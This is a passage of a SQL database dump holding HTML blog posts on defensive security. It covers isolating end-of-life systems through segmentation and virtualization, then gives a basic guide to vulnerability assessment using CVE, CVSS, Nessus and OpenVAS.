class=\"font-bold\">1. Minimizing Exposure</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By isolating an EOL system, you effectively limit its interaction with other systems and users on the network, reducing the likelihood of an attack spreading.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Network Segmentation</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Techniques like Virtual LANs (VLANs), air-gapping, or using firewalls help create distinct zones within your network. These zones can restrict access to EOL systems, making them harder to breach.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Real-World Example</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider a manufacturing firm using EOL software to control industrial machinery. When their network was attacked, segmentation ensured the breach was contained to low-priority systems, saving their production line from disruption.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Alternatives for Organizations Dependent on EOL Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For organizations that cannot immediately replace their EOL systems, adopting alternative strategies is essential to reduce risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Virtualization</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Run EOL systems within virtual machines (VMs) to isolate them from your core network. Virtualization provides an additional layer of security and makes it easier to monitor and manage legacy systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Dedicated Hardware</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Place EOL systems on standalone, non-networked hardware to eliminate network-based threats. While not ideal for all use cases, this approach minimizes exposure.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Network Segmentation</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use firewalls and VLANs to create dedicated zones specifically for EOL systems, restricting communications to only essential services.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Third-Party Support</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some vendors offer extended support for widely used EOL software. These services can include custom patches, monitoring, and technical assistance.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Securing EOL Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you\'re isolating EOL systems or strategically using them within your enterprise, implementing robust security measures is essential to minimize risk.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Conduct Regular Vulnerability Assessments</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use tools like <b><strong class=\"font-bold\">Nessus</strong></b> or <b><strong class=\"font-bold\">OpenVAS</strong></b> to identify and address vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Schedule frequent assessments to ensure your systems remain as secure as possible.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Implement Strong Access Controls</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Restrict access to EOL systems using the principle of least privilege.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enforce multi-factor authentication (MFA) to make unauthorized access more challenging.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Apply Patch Management Strategies</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Look for community-supported patches or updates.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">If patching isn’t possible, implement compensating controls, such as monitoring or additional firewalls.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Monitor Network Traffic</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use tools like intrusion detection systems (IDS) or intrusion prevention systems (IPS) to constantly monitor for suspicious activity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Regularly review logs to identify unusual actions that may indicate compromise.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5. Develop Backup and Recovery Plans</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly back up EOL systems to minimize downtime in the event of a breach or failure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Test recovery procedures to ensure minimal disruption when the time comes.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of IT Security Experts and System Administrators</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Securing EOL systems isn’t a one-time effort; it requires continuous vigilance from your IT security team and system administrators.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Proactive Monitoring</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT security professionals should constantly monitor the health and activity of EOL systems, flagging anomalies before they escalate into threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Incident Response Planning</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every organization should develop and maintain an incident response plan that specifically addresses EOL-related vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Employee Training and Awareness</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Educating employees about the risks of EOL systems and the importance of adhering to isolation measures can prevent accidental breaches.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Advocacy for Modernization</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT leaders should advocate for transitioning away from EOL systems wherever possible, presenting executives with cost-benefit analyses to push for upgrades.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Conclusion</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EOL systems and applications remain an operational necessity for many organizations. While they can\'t always be eliminated, the risks they pose cannot be ignored. By isolating these legacy technologies from the main network, implementing stringent security measures, and exploring alternatives like virtualization, organizations can continue using EOL systems without compromising their cybersecurity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For cybersecurity enthusiasts, testing these strategies in a controlled lab environment can refine skills and provide hands-on experience in securing legacy systems.</p>', '', NULL, NULL, 1, 'draft', '2025-01-27 13:00:11', '2026-01-12 21:41:44', 'Information Security', 'Why Isolating End-of-Life (EOL) Systems is Critical for Cybersecurity', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(55, 'How to Perform a Basic Vulnerability Assessment', 'how-to-perform-a-basic-vulnerability-assessment', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity threats are evolving, targeting organizations and individuals alike. Conducting a thorough vulnerability assessment is a crucial step in safeguarding systems against potential attacks. But how do you begin this process, and why are CVE (Common Vulnerabilities and Exposures) and CVSS (Common Vulnerability Scoring System) so vital? This guide will walk you through everything you need to know to perform a basic vulnerability assessment effectively.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Vulnerability Assessment?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A <b><strong class=\"font-bold\">vulnerability assessment</strong></b> is the process of identifying, evaluating, and prioritizing vulnerabilities in systems, networks, and applications. The goal is to detect weaknesses before bad actors can exploit them. Whether you\'re managing a corporate IT infrastructure or securing your home computer, vulnerability assessments are vital for proactively managing risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Vulnerability Assessment Important?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Preempt Threats</strong></b>: Identifying vulnerabilities before they can be exploited can save you from costly breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Build a Stronger Security Posture</strong></b>: It helps strengthen your defenses and stay compliant with regulatory standards.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Prioritize Risks</strong></b>: Not all vulnerabilities are equal—this process helps you focus on those that pose the greatest danger.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding Common Vulnerabilities and Exposures (CVE)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">CVE</strong></b>, or Common Vulnerabilities and Exposures, is a standardized list of publicly known software vulnerabilities. Each CVE has a unique identifier (e.g., CVE-2024-12345), making it easier for security professionals to share and act on information about specific threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Does CVE Matter?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Standardized References</strong></b>: CVE makes it possible for different organizations, tools, and experts to communicate effectively about vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Quick Identification</strong></b>: Knowing the CVE number of a vulnerability helps locate detailed information and actionable fixes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Global Relevance</strong></b>: Security tools like Nessus and OpenVAS often reference CVEs to explain their findings.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Introduction to the Common Vulnerability Scoring System (CVSS)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While CVE identifies vulnerabilities, the <b><strong class=\"font-bold\">Common Vulnerability Scoring System (CVSS)</strong></b> assigns them a severity score on a scale of 0 to 10. This score helps prioritize which vulnerabilities to address first.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Does CVSS Work?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CVSS calculates a vulnerability\'s severity based on three metrics:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Base</strong></b> (exploitability and impact)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Temporal</strong></b> (how mitigations or fixes reduce risk over time)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Environmental</strong></b> (the specific impact on your environment)</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Severity Levels:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">0.0–3.9 → Low</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">4.0–6.9 → Medium</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">7.0–8.9 → High</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">9.0–10.0 → Critical</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding CVSS allows IT professionals to prioritize vulnerabilities that pose the most significant risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools for Performing a Vulnerability Assessment</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are many tools available for vulnerability scanning. Here, we’ll focus on <b><strong class=\"font-bold\">Nessus</strong></b> and <b><strong class=\"font-bold\">OpenVAS</strong></b>, two of the most popular options.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Nessus</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Key Features</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive plugin library</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Detailed reporting</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Integration with CVE and CVSS databases</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">How to Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Download and install the software.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Configure scan settings (e.g., target IPs or URLs).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Analyze the results and focus on vulnerabilities with higher CVSS scores.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. OpenVAS (Open Vulnerability Assessment Scanner)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Key Features</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Open-source platform</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regular updates with new vulnerability definitions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Support for scanning networks, services, and applications</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">How to Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Set up OpenVAS on a server or virtual machine.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Define the scope of the scan and start scanning.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Review the detailed output and cross-reference CVEs.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both tools are invaluable for discovering potential weaknesses in your network or application environment.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Guide to Conducting a Vulnerability Assessment</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how to perform a basic assessment from start to finish:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Define the Scope</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Identify the systems, networks, or applications you want to scan. Make sure you have proper permission to scan the target environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Choose Your Tool</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Install and configure a vulnerability scanner like Nessus or OpenVAS based on the complexity of your system.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Run the Scan</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Set up your scanner, inputting the target assets (e.g., IP ranges or URLs). Start the scan to identify vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Analyze the Results</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Review the scan report and take note of vulnerabilities with high and critical CVSS scores. Identify the associated CVEs for each.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Take Action</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Develop a plan to address the vulnerabilities. Patch outdated software, harden misconfigured systems, or implement workarounds where no direct fix is available.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Validate the Fixes</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After addressing vulnerabilities, rerun the scan to confirm that issues have been resolved.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Vulnerability Management</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Prioritize with CVSS</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Focus first on vulnerabilities with critical and high CVSS scores for quick mitigation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" 